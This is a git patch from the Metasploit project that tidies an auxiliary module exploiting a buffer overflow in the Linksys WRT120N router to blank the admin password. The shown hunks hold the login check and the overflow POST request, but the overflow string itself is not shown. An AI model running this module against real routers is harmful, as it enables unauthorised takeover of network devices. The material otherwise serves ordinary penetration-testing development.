From 582372ec3e81e0cad5019b420ee4d68b51d0bac2 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 26 Feb 2014 09:32:11 -0600
Subject: [PATCH] Do minor cleanup

---
 .../http/linksys_tmunblock_admin_reset_bof.rb | 76 ++++++++++---------
 1 file changed, 39 insertions(+), 37 deletions(-)

diff --git a/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb b/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb
index 09e785de2f..1afd4a56c5 100644
--- a/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb
+++ b/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb
@@ -13,9 +13,10 @@ class Metasploit3 < Msf::Auxiliary
     super(update_info(info,
       'Name'            => 'Linksys WRT120N tmUnblock Buffer Overflow',
       'Description'     => %q{
-          This module exploits a buffer overflow vulnerability in the WRT120N Linksys router.
-         It is possible to reset the password of the management interface temporarily to an
-         empty value. It was tested on a WRT120N firmware version 1.0.07.
+        This module exploits a buffer overflow vulnerability in the WRT120N Linksys router
+        to reset the password of the management interface temporarily to an empty value.
+        This module has been tested successfully on a WRT120N device with firmware version
+        1.0.07.
       },
       'Author'          =>
         [
@@ -32,33 +33,34 @@ class Metasploit3 < Msf::Auxiliary
       'DisclosureDate' => 'Feb 19 2014'))
   end
 
-  def check_login(user,pass)
+  def check_login(user)
     print_status("#{peer} - Trying to login with #{user} and empty password")
-    begin
-      res = send_request_cgi({
-        'uri'     => '/',
-        'method'  => 'GET',
-        'authorization' => basic_auth(user,"")
-      })
-      if res.nil? or res.code == 404
-        print_status("#{peer} - No successful login possible with #{user} and empty password")
-        return false
-      end
-      if [200, 301, 302].include?(res.code)
-        print_good("#{peer} - Successful login #{user} and empty password")
-        return true
-      else
-        print_status("#{peer} - No successful login possible with #{user} and empty password")
-        return false
-      end
-    rescue ::Rex::ConnectionError
-      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    res = send_request_cgi({
+      'uri'     => '/',
+      'method'  => 'GET',
+      'authorization' => basic_auth(user,"")
+    })
+    if res.nil? || res.code == 404
+      print_status("#{peer} - No successful login possible with #{user} and empty password")
+      return false
+    elsif [200, 301, 302].include?(res.code)
+      print_good("#{peer} - Successful login #{user} and empty password")
+      return true
+    else
+      print_status("#{peer} - No successful login possible with #{user} and empty password")
+      return false
     end
   end
 
   def run
-    if (check_login("admin","") == true)
-      print_good("#{peer} - login with user admin and no password possible. There is no need to use this module.")
+
+    begin
+      if check_login("admin")
+        print_good("#{peer} - login with user admin and no password possible. There is no need to use this module.")
+        return
+      end
+    rescue ::Rex::ConnectionError
+      print_error("#{peer} - Failed to connect to the web server")
       return
     end
 
@@ -87,22 +89,22 @@ class Metasploit3 < Msf::Auxiliary
           'uri'    => uri,
           'method' => 'POST',
           'vars_post' => {
-              'period' => '0',
-              'TM_Block_MAC' => '00:01:02:03:04:05',
-              'TM_Block_URL' => postdata
-           }
+            'period' => '0',
+            'TM_Block_MAC' => '00:01:02:03:04:05',
+            'TM_Block_URL' => postdata
+          }
         })
-        if res and res.code == 500
-           if (check_login("admin","") == true)
-             print_good("#{peer} - Expected answer and the login was successful. Try to login with the user admin and a blank password")
-           else
-             print_status("#{peer} - Expected answer, but unknown exploiting status. Try to login with the user admin and a blank password")
-           end
+      if res and res.code == 500
+        if check_login("admin")
+          print_good("#{peer} - Expected answer and the login was successful. Try to login with the user admin and a blank password")
         else
-           print_error("#{peer} - Unexpected answer. Exploiting attempt has failed")
+          print_status("#{peer} - Expected answer, but unknown exploiting status. Try to login with the user admin and a blank password")
         end
+      else
+        print_error("#{peer} - Unexpected answer. Exploiting attempt has failed")
+      end
     rescue ::Rex::ConnectionError
-      vprint_error("#{peer} - Failed to connect to the web server")
+      print_error("#{peer} - Failed to connect to the web server")
       return
     end
   end